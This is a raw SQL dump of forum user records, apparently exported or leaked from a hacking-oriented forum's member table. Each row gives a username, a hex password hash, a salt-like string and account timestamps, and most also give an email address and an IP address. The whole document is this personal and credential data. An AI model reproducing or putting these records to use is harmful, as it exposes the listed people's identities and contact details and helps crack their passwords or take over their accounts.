(190, 2, '', 0, 'Str3am', '7b2a983146c6317f235d7228c410bb1e', '2015-10-27', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1445942100, -1, 1446482142, 1447945856, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '+`e{%z#(^%pDW^n^^0k,BlSg9d2Lwm', 0, 0, 0, '', 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(191, 2, '', 0, 'hack2life', 'b899fe49298c0778dff95e52b6f884a9', '2015-10-30', 'truecrownprince@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217285, 0, 1450991629, 1451484431, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.5', 0, 1, 0, 0, -1, 0, 0, 'x5xD;*vsXIj/;-\"c[t&7Nmq=FI7(+l', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(192, 2, '', 0, 'aPuhov', '6db81cfb26fdcbcbd3ab9bc9adbafd19', '2015-10-30', 'alex_puhov@mail2tor.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217285, 0, 1446217285, 1446217297, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.49', 0, 1, 0, 0, -1, 0, 0, '_kUXX;B)S)1J_OS/Y\'1[bl{*<9C@,K', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(193, 2, '', 0, 'ssdtux', '411a43d353379686fd067bf5899c54ef', '2015-10-30', 'ssdtux@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446217808, 0, 1458084463, 1458084463, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.71', 0, 1, 0, 0, -1, 0, 0, 'CXdI)Y{Dq+)J:Jw_/D]sv7+cRfy_miRqr]e<@KUGwm', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(198, 2, '', 0, 'DDShadoww', '2e175be6bb0515597e57cfd33f7826e7', '2015-10-30', 'ddshadoww@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446219634, 0, 1446582261, 1447754455, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, '\"U/g-/ZN$w>/!jF/rv/Q08JS>b(FPI', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(199, 2, '', 0, 'kukumumu', '54123a02d545bfee206b4dcc8768f624', '2015-10-30', 'Kukumumu@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446220230, 0, 1446220230, 1446220230, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.14', 0, 1, 0, 0, -1, 0, 0, 'tPS9}R<}!igL_\"&;=K=r<-aoT,!5/$', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(200, 2, '', 0, 'bingo', '0346d6ebc7cdedf99bb404d24843813c', '2015-10-30', 'pentagor@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446221412, 0, 1446221412, 1446221432, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.90.140', 0, 1, 0, 0, -1, 0, 0, 'F2GHd%Y[bhE!b-Q6~UlSLe=kO*]]N3', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(201, 2, '', 0, 'r00t', '0b96f5907f8aa1c8e47347f23b86f35a', '2015-10-30', 'bashsplit@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446221508, 0, 1446221538, 1447755574, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.90.140', 0, 1, 0, 0, -1, 0, 0, ')$497d6AvP}cE/]%pZi25P[w<@$!ld', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(202, 2, '', 0, 'neuegram', 'd1e096600712a94973addfab8d03adad', '2015-10-30', 'neuegram@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222530, 0, 1446222530, 1446222612, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.50.68', 0, 1, 0, 0, -1, 0, 0, '?0I\\rB:XM,h+S#=XMFWM3iuU*v\\?a.', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(203, 2, '', 0, 'LonerD', '119db764d0bbd8a2cebd3c6086507ba5', '2015-10-30', 'kailost@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222660, 0, 1446222660, 1446223120, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.13', 0, 1, 0, 0, -1, 0, 0, 'L;>;%wH1[YnZKuT:Q2g$eQ2ua.@)S$', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(204, 2, '', 0, 'easyrider', 'd76d3773bd11570725364b94e25c25d3', '2015-10-30', 'isa817@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446222713, 0, 1446222713, 1446222881, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.91.146', 0, 1, 0, 0, -1, 0, 0, 'u[Xr8;+s>P&,lK+V#W\"Ex=vR44iPz[', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(205, 2, '', 0, 'milk', '99014406df723cc48c530d514dd16066', '2015-10-30', 'rjkilk@ohlol.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446223260, 0, 1446223260, 1446223391, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.20', 0, 1, 0, 0, -1, 0, 0, 'lmYmh9s>)%wHf0h/LSL4yPS:URYT^Lw,%0OK\';4ILx13', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(208, 2, '', 0, 'b0cah', '6eb8fd9431613c4f5034067700ae61b9', '2015-10-30', 'tejobro1@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224115, 0, 1449123926, 1449125399, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.225.14', 0, 1, 0, 0, -1, 0, 0, 'O[X_XOe5GEWEspsr;z,X}*!ik+_', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(210, 2, '', 0, 'aslan', '361e74b6d6aab655277e921bff4d7a1b', '2015-10-30', 'dukaev999@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224693, 0, 1451074037, 1451528741, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, '}JLTY,e%3{\\MpmVTS@)#c>Gx{2.T:.', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(211, 2, '', 0, 'gago21', 'e2f9016074f4e96c49ad983f88ee1512', '2015-10-30', 'wanted_kus@hotmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224724, 0, 1467638132, 1467638132, 1456070598, 2900, 1, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.71', 100, 1, 0, 0, -1, 0, 0, 'Jj<3E{1]V$x@u1GQ54=;#Ra<\"=\"P6w', 0, 0, 0, '', 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(212, 2, '', 0, 'jovie', 'dc154864424505992a3f92cc688fef81', '2015-10-30', 'jovie@ngs.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446224982, 0, 1446228533, 1446228533, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.101', 0, 1, 0, 0, -1, 0, 0, 'Kq[UR!&-:XAUTk/>9\"6p(J.A60JYGz', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(213, 2, '', 0, 'ownager', '559422617d42ca083e8db66e04dc88dc', '2015-10-30', 'drmint80@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446226585, 0, 1446226585, 1446226877, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.53.107', 0, 1, 0, 0, -1, 0, 0, '_*Pc]HTT]%|L_0|}%yM\\x+S_a-#3Y}', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(214, 2, '', 0, 'undefined', '6d83b7f3a2e5fcf174db8b62098a21c5', '2015-10-30', 'undefined@grr.la', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228194, 0, 1446228212, 1446228212, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.49.64', 0, 1, 0, 0, -1, 0, 0, 'JzSehlt{;!2dSqP9U[+D#z8O:G,mWO', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(215, 2, '', 0, 'darckness44', 'f681e5ff279d06548c52ee4aa82e0cd9', '2015-10-30', 'darckness44@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228239, 0, 1446228239, 1446230149, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.49.64', 0, 1, 0, 0, -1, 0, 0, 'P7!Vsrf~G{Q[>AYCe3BN=bx\'}6@~Xb', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(216, 2, '', 0, 'ree4', '9896b87f5094e7a286a4d63417f27fb2', '2015-10-30', 'samirsamo1337@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446228840, 0, 1471642484, 1471642484, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.253', 0, 1, 0, 0, -1, 0, 0, '-n(-nTS5Qs\"#vnBJ!Uv45\"%*YX;5m>', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(217, 2, '', 0, 'pr0cx', '87d87a35c1841271c5c907253910665d', '2015-10-30', 'mrripmax@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446229003, 0, 1446229109, 1446236152, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '188.114.99.91', 0, 1, 0, 0, -1, 0, 0, 'sWK}8yJW\'M`mJ9gU\'X$9BD=[f*T+O\'Y930:,~w-gj8d&', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(219, 2, '', 0, 'wootak', '158725d1f3e6727d54010b47fccf551c', '2015-10-30', 'unctus@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230077, 0, 1446230077, 1446230112, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '108.162.210.131', 0, 1, 0, 0, -1, 0, 0, '?M\'G#HTF\"aui-YU\\|lquO,SXP=u\"]]', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(220, 2, '', 0, 'zepsus', '96a33604467e34009339747d6260f652', '2015-10-30', 'zepsusyo@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230251, 0, 1462636354, 1462636354, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.130', 0, 1, 0, 0, -1, 0, 0, 'y]6p0A91q.coPhDJ\\_G}F`n0cJ\\.bA', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(221, 2, '', 0, 'ShadowHat', '87779363a40f8dc5a7bf6071b6815d09', '2015-10-30', 'shadow_hat@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446230847, 0, 1446230847, 1446231635, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.17.6', 0, 1, 0, 0, -1, 0, 0, ';.Oc/N0C~[iDCoC<5wpJzTLEDK@P0o', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(222, 2, '', 0, 'Fullk1d', '43a533eb0b48ae8773789452fffc5c71', '2015-10-30', 'fortesting2015@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232339, 0, 1446232701, 1456062423, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '162.158.103.99', 0, 1, 0, 0, -1, 0, 0, ',f1`Y!t|-:h+C/H&5Y)fbU#\\jpk#]l', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(223, 2, '', 0, 'kdiler', '551e66159e70df30cae90d424f058fd8', '2015-10-30', 'kochevd@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232379, 0, 1456241843, 1456428360, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.81.16', 0, 1, 0, 0, -1, 0, 0, 'e!eSgNX_PAX&GfXavxv](#,)+4w8je', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(224, 2, '', 0, 'lol', 'a65824bd714dbb58bd37478558f3da4f', '2015-10-30', 'ddmcc@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446232631, 0, 1446233574, 1446441631, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.248', 0, 1, 0, 0, -1, 0, 0, 'b@viM]b--i2r7IiB(xQS)?-O;u[#zK', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(225, 2, '', 0, 'Taygga', '760e7badd87dc63d43783d2c73aee865', '2015-10-30', 'taygga@inbox.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446233044, 0, 1446233044, 1446233277, 0, 0, 0, 0, 4, '7', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '141.101.81.22', 0, 1, 0, 0, -1, 0, 0, 'G#CYE,_#b&T`$4Q@Fe|lJ+9W7`EUSJ', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(226, 2, '', 0, 'Daynine', 'ee7ea7c363b3bb7ef8b7e03bb8adeb34', '2015-10-30', 'Dday394@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446233170, 0, 1446233170, 1446233170, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.81.14', 0, 1, 0, 0, -1, 0, 0, 'Tq94tz9I[=].\\%rYp>d+u{j;Q>d;92', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(227, 2, '', 0, 'Ivan', '2b9f425a94bf3b9fdf8fd1761fa51c73', '2015-10-30', 'dom13@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446235953, 0, 1472005052, 1472005052, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.91.86', 0, 1, 0, 0, -1, 0, 0, '5blKM3]Tf;gP%(\\u+q/-Ne\'y8u^]5:', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(228, 2, '', 0, 'r0rshark', 'ae15c1ab4655cbc5f3abe65c985524f7', '2015-10-30', 'fons.pentest@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446240184, 0, 1446240184, 1446240461, 0, 0, 0, 0, 4, '1', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.105.247', 0, 1, 0, 0, -1, 0, 0, '?-femO0pN=\';;&WEXD?,ID~M/lY=,o', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(229, 2, '', 0, '0l3g', '20bbdeaff829e6b281238a5bad4ccc54', '2015-10-31', 'coolkid@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446249579, 0, 1446251537, 1446251537, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.19', 0, 1, 0, 0, -1, 0, 0, '8P8+&&8RP_p!SXG/Pc@T!m($;dG4~s', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(230, 2, '', 0, 'naGDan', '09919cd220b64ffab22ecd989d9cabe7', '2015-10-31', 'nagdan@ya.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446249698, 0, 1446249714, 1446272744, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.80.12', 0, 1, 0, 0, -1, 0, 0, '(wE/V1)iN&R)di]LnLY\'{w`tt;3+1E', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(231, 2, '', 0, 'karasawa', 'a7b02b535da40a7ca2e815ec009218cc', '2015-10-31', 'sixfourgigabyte@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446263559, 0, 1446537639, 1446541393, 0, 0, 0, 0, 4, '9', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.226.43', 0, 1, 0, 0, -1, 0, 0, '^U\'1pg9cUF\\}cTCV7rRs\'J#dea?6Lh', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(232, 2, '', 0, 'strlock', '15350e3993c30662024b7e47326a5d70', '2015-10-31', 'strlock@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446270681, 0, 1446270681, 1446271008, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.32', 0, 1, 0, 0, -1, 0, 0, '<$ygx&Z~1GEX*#KO):Xp7NW]IxZJFo', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(233, 2, '', 0, 'ultra', 'da1a400225eeb262442a25c1eb7c75d8', '2015-10-31', 'support@techgroup.me', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276101, 0, 1446276101, 1446276276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.181', 0, 1, 0, 0, -1, 0, 0, 't!y/Slxmd[zqOCl\\\"-u@\\[,\"X|MTff', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(234, 2, '', 0, 'gagaloop', '27d23cb2e92d3a7ea39e5941358c3bd9', '2015-10-31', 'gagalo0pp@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276367, 0, 1446276367, 1446278115, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '108.162.216.193', 0, 1, 0, 0, -1, 0, 0, 'f\"13}*G|D+(EQpqWmz}O$3s*`@wG{2', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(235, 2, '', 0, 'ca0', 'e7b1470765a4fa7f03509f39da9c9561', '2015-10-31', 'trueinstaller@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276686, 0, 1446276748, 1446276748, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.241.176', 0, 1, 0, 0, -1, 0, 0, 'xqj=ys{sX;daVS1o7s82i8m*PI#/Pl', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(236, 2, '', 0, 'Ar3s', 'c25b8d8c9f966cb886befc0396d95e1f', '2015-10-31', 'whoiam@freeletter.me', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446276756, 0, 1446278978, 1446280790, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.104.181', 0, 1, 0, 0, -1, 0, 0, 'N2QCN9fqZ`f!gkXdH8XVc`K1G@>J:8', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(237, 2, '', 0, 'kail', 'bbe8fffe8612251758559f2a0f566041', '2015-10-31', '2ak4d@notsharingmy.info', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446279360, 0, 1454173752, 1457729725, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.216.183', 0, 1, 0, 0, -1, 0, 0, 'YU)glp4$0+2.qc_PE$jom8I\"VNvRwV}JYUEQcSyj', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(246, 2, '', 0, 'tao', '9d7f0fe982d9f76e7fe654366d7ea899', '2015-10-31', 'tailoredaccessoperations@hush.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446292990, 0, 1446293117, 1456065286, 0, 0, 0, 0, 4, '-8', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.91.109', 0, 1, 0, 0, -1, 0, 0, '78\\\'9wQw)$.N/pv$:6q~[%W|2P}Qt\\', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(247, 2, '', 0, 'painter', '4281eeecbb5e1ec8ecda4efc134bd9df', '2015-10-31', 'painter@live.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446293542, 0, 1446293542, 1446293573, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '141.101.105.231', 0, 1, 0, 0, -1, 0, 0, 'cL)$5sfgN9[b%4q?%56^%5v`eRJzYb', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(248, 2, '', 0, 'tirefire', 'd4def808a21f9a7db5d7677cb6092983', '2015-10-31', 'uj@mailinator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446294896, 0, 1446294896, 1446294994, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.55.197', 0, 1, 0, 0, -1, 0, 0, 'JkAAtT<-.%;EPVIj)DXtI3Wb-^ywDS', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(250, 2, '', 0, 'null3d', '6d982b8ae26a9b68cd95693e20fa639b', '2015-10-31', 'lol@mt2015.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446297210, 0, 1446297210, 1446297419, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.43', 0, 1, 0, 0, -1, 0, 0, 'ozj|\"Pe&l};.rLAnJBQ1r>$iF+m,,t', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(259, 2, '', 0, 'sup3ria', '3a01d41287082b9f7ee465582644b318', '2015-10-31', 'john.smitherham@openmailbox.org', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446326148, 0, 1446326148, 1446326276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '162.158.91.129', 0, 1, 0, 0, -1, 0, 0, '0d43GS]AJe2pRkpa9U6uA.;F_:ft|z', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(260, 2, '', 0, 'zullek', '21e97d7f10f6040c44119ec4b3d1c781', '2015-11-01', 'zullek@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446334335, 0, 1446334335, 1446334385, 0, 0, 0, 0, 4, '3', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.93', 0, 1, 0, 0, -1, 0, 0, '|4!hRMDQrv*r=p^*YU/DHb3>ib2ga<', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(261, 2, '', 0, 'cc0de', 'd192ee59a44ae30ff56ca8141bf7363a', '2015-11-01', 'cc0de@icloud.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446355240, 0, 1446360520, 1446361634, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.229.16', 0, 1, 0, 0, -1, 0, 0, '4w]%b`bX18{U#!|Z*>-_&Dh!Tb/+n?3', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(263, 2, '', 0, 'vx9090', 'bb9467f932f6dee949e5a93885411cbc', '2015-11-01', 'sahvbddas37@ghostmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446397330, 0, 1446397575, 1446397788, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.90.84', 0, 1, 0, 0, -1, 0, 0, '@/S1F]:fbzs9^StWU*bLO$fQ0|4N73', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(264, 2, '', 0, 'Cyber Tjak', 'ace6bf9f20c781d66f9961debedb9b3e', '2015-11-01', '1337Tjak@Googlemail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446407319, 0, 1446407527, 1449938985, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '141.101.104.93', 0, 1, 0, 0, -1, 0, 0, '|zLul~HO&UHS&P5V+;S0YegHOLNzoF', 0, 0, 0, '', 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(265, 2, '', 0, 'Tyskie', 'a2917e66cd6940574d9844d2f83af98d', '2015-11-01', 'uoukouku@wegwerfemail.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446407812, 0, 1446407812, 1446409180, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.104.143', 0, 1, 0, 0, -1, 0, 0, 'WHR09G$LSB\"!mXYn\"\"-&-', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(267, 2, '', 0, 'fuzzyf10w', '49cddf23bf774cf28b13d81ba010ff58', '2015-11-02', 'w01fyzzuf@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1446441007, 0, 1446441231, 1446532827, 0, 0, 0, 0, 4, '6', 0, 0, 0, 0, 0, 45091863, '', '0000-00-00', -1, -1, '173.245.53.73', 0, 1, 0, 0, -1, 0, 0, 'PYhWKoMGT-e=,oxz5AmruhY;w(RX,!', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
